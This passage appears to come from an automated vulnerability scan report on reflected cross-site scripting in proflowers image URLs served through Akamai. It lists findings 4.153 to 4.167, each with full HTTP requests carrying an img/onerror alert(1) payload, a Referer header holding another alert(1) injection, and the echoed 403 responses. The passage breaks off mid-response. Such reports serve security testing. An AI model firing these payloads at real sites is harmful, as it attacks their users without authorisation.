GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ4d8aa<img%20src%3da%20onerror%3dalert(1)>3b6dc5e579c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:16 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ4d8aa<img src=a onerror=alert(1)>3b6dc5e579c

4.153. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload f6cb8<img%20src%3da%20onerror%3dalert(1)>ebea8158570 was submitted in REST URL parameter 9 and was echoed as f6cb8<img src=a onerror=alert(1)>ebea8158570 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PFf6cb8<img%20src%3da%20onerror%3dalert(1)>ebea8158570?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/SUN10yellowfill_pnk11_PFf6cb8<img src=a onerror=alert(1)>ebea8158570

4.154. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload e6bab<img%20src%3da%20onerror%3dalert(1)>4ea615db158 was submitted in REST URL parameter 9 and was echoed as e6bab<img src=a onerror=alert(1)>4ea615db158 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PFe6bab<img%20src%3da%20onerror%3dalert(1)>4ea615db158?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:50 GMT
Connection: close

Unable to find /ProvideCommerce/TUL15assrt_sgv09_PFe6bab<img src=a onerror=alert(1)>4ea615db158

4.155. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload 1c0f1<img%20src%3da%20onerror%3dalert(1)>785ef5a0184 was submitted in REST URL parameter 9 and was echoed as 1c0f1<img src=a onerror=alert(1)>785ef5a0184 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF1c0f1<img%20src%3da%20onerror%3dalert(1)>785ef5a0184?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20assrt_grn10_test_PF1c0f1<img src=a onerror=alert(1)>785ef5a0184

4.156. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload b5317<img%20src%3da%20onerror%3dalert(1)>da90941c6d7 was submitted in REST URL parameter 9 and was echoed as b5317<img src=a onerror=alert(1)>da90941c6d7 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PFb5317<img%20src%3da%20onerror%3dalert(1)>da90941c6d7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:08 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30assrt_tv11_catalog_PFb5317<img src=a onerror=alert(1)>da90941c6d7

4.157. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload 2eb13<img%20src%3da%20onerror%3dalert(1)>daf816ec27c was submitted in REST URL parameter 9 and was echoed as 2eb13<img src=a onerror=alert(1)>daf816ec27c in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF2eb13<img%20src%3da%20onerror%3dalert(1)>daf816ec27c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:54 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30purple_purpletrmp11_PF2eb13<img src=a onerror=alert(1)>daf816ec27c

4.158. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload bf2d8<img%20src%3da%20onerror%3dalert(1)>e597a089cde was submitted in REST URL parameter 9 and was echoed as bf2d8<img src=a onerror=alert(1)>e597a089cde in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_lbf2d8<img%20src%3da%20onerror%3dalert(1)>e597a089cde?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:25 GMT
Connection: close

Unable to find /ProvideCommerce/TropOrgSmplrPF_lbf2d8<img src=a onerror=alert(1)>e597a089cde

4.159. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload 9159b<img%20src%3da%20onerror%3dalert(1)>e6aa7594d00 was submitted in REST URL parameter 9 and was echoed as 9159b<img src=a onerror=alert(1)>e6aa7594d00 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m9159b<img%20src%3da%20onerror%3dalert(1)>e6aa7594d00?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTherbal09book_m9159b<img src=a onerror=alert(1)>e6aa7594d00

4.160. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload 4e41e<img%20src%3da%20onerror%3dalert(1)>33229c41e77 was submitted in REST URL parameter 9 and was echoed as 4e41e<img src=a onerror=alert(1)>33229c41e77 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF4e41e<img%20src%3da%20onerror%3dalert(1)>33229c41e77?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTlavendarluxe_PF4e41e<img src=a onerror=alert(1)>33229c41e77

4.161. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload e84a1<img%20src%3da%20onerror%3dalert(1)>2db1c5fbe55 was submitted in REST URL parameter 9 and was echoed as e84a1<img src=a onerror=alert(1)>2db1c5fbe55 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_le84a1<img%20src%3da%20onerror%3dalert(1)>2db1c5fbe55?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/WRTremembrance09_le84a1<img src=a onerror=alert(1)>2db1c5fbe55

4.162. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload a0a24<img%20src%3da%20onerror%3dalert(1)>c317587d015 was submitted in REST URL parameter 9 and was echoed as a0a24<img src=a onerror=alert(1)>c317587d015 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_la0a24<img%20src%3da%20onerror%3dalert(1)>c317587d015?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTsympathy_la0a24<img src=a onerror=alert(1)>c317587d015

4.163. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload 57238<img%20src%3da%20onerror%3dalert(1)>343bdc9b250 was submitted in REST URL parameter 9 and was echoed as 57238<img src=a onerror=alert(1)>343bdc9b250 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn57238<img%20src%3da%20onerror%3dalert(1)>343bdc9b250?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/accgenblue09_tn57238<img src=a onerror=alert(1)>343bdc9b250

4.164. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload 7cd4b<img%20src%3da%20onerror%3dalert(1)>1abce527698 was submitted in REST URL parameter 9 and was echoed as 7cd4b<img src=a onerror=alert(1)>1abce527698 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b7cd4b<img%20src%3da%20onerror%3dalert(1)>1abce527698?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/p0007703b7cd4b<img src=a onerror=alert(1)>1abce527698

4.165. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload b9a40<img%20src%3da%20onerror%3dalert(1)>618e53e1f8f was submitted in REST URL parameter 9 and was echoed as b9a40<img src=a onerror=alert(1)>618e53e1f8f in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868bb9a40<img%20src%3da%20onerror%3dalert(1)>618e53e1f8f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/p0074868bb9a40<img src=a onerror=alert(1)>618e53e1f8f

4.166. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload a461f<img%20src%3da%20onerror%3dalert(1)>5417133fe9d was submitted in REST URL parameter 9 and was echoed as a461f<img src=a onerror=alert(1)>5417133fe9d in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749ba461f<img%20src%3da%20onerror%3dalert(1)>5417133fe9d?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/p0084749ba461f<img src=a onerror=alert(1)>5417133fe9d

4.167. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload ebe78<img%20src%3da%20onerror%3dalert(1)>d7b15d166f5 was submitted in REST URL parameter 9 and was echoed as ebe78<img src=a onerror=alert(1)>d7b15d166f5 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tnebe78<img%20src%3da%20onerror%3dalert(1)>d7b15d166f5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
